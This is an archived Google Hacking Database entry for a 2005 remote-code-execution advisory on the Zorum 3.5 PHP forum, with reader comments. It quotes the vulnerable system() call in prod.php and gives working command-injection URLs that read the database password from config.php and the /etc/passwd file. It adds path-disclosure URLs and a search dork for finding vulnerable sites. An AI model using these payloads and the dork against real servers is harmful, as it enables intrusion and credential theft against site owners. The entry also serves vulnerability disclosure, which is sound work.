GHDB
GHDB
|
Google Search: “Powered by Zorum 3.5″
rgod rates this entry 8 out of 10. Submitted: 2005-08-18 00:00:00 Added by: rgod Hits: 1453 Score: 8 Zorum 3.5 remote code execution poc exploitsoftware:description: Zorum is a freely available, open source Web-based forumapplication implemented in PHP. It is available for UNIX, Linux, and any otherplatform that supports PHP script execution.author site: http://zorum.phpoutsourcing.com/1) remote code execution:vulnerable code, in /gorum/prod.php file:07 $doubleApp = isset($argv[1]); …14 if( $doubleApp )15 {16 $appDir = $argv[1];17 system(“mkdir $prodDir/$appDir”); …a user can execute arbitrary commands using pipe char, example:http://[target]/zorum/gorum/prod.php?argv[1]=|ls%20-lato list directorieshttp://[target]/zorum/gorum/prod.php?argv[1]=|cat%20../config.phpto see database username/password…http://[target]/zorum/gorum/prod.php?argv[1]=|cat%20/etc/passwdto see /etc/passwd file2) path disclosure:http://[target]/zorum/gorum/notification.phphttp://[target]/zorum/user.phphttp://[target]/zorum/attach.phphttp://[target]/zorum/blacklist.phphttp://[target]/zorum/forum.phphttp://[target]/zorum/globalstat.phphttp://[target]/zorum/gorum/trace.phphttp://[target]/zorum/gorum/badwords.phphttp://[target]/zorum/gorum/flood.phpand so on…googledork:”Powered by Zorum 3.5″rgodsite: http://rgod.altervista.orgmail: retrogod at aliceposta itoriginal advisory: http://rgod.altervista.org/zorum.html Comments: 2005-09-18 16:12:45 (wizel): in every one i tried: Warning: fopen(t3.txt): failed to open stream: Permission denied in /usr/local/src/zorum_3_5/gorum/prod.php on line 78 Warning: file(t2.txt): failed to open stream: No such file or directory in /usr/local/src/zorum_3_5/gorum/prod.php on line 79 Warning: fclose(): supplied argument is not a valid stream resource in /usr/local/src/zorum_3_5/gorum/prod.php on line 83 Warning: file(t3.txt): failed to open stream: No such file or directory in /usr/local/src/zorum_3_5/gorum/prod.php on line 84 Warning: file(t1.txt): failed to open stream: No such file or directory in /usr/local/src/zorum_3_5/gorum/prod.php on line 91 Vege 2005-10-06 22:45:57 (rgod): this requires that “register_globals” is enabled and “register_argc_argv” is disabled and obviously, safe mode off. |
Does GHDB still updates for now?
The GHDB is alive and well, updated through the ExploitDB: http://www.exploit-db.com/google-dorks.
Hi Johnny,been a while since I’ve came last. Aren’t you gonna update this website anymore???
The GHDB is not updated and lives with the exploitdb: http://http://www.exploit-db.com. Please check out the awesome folks at Offensive Security as well: http://www.offensive-security.com!
Is any offline view-able resources is available of this product ?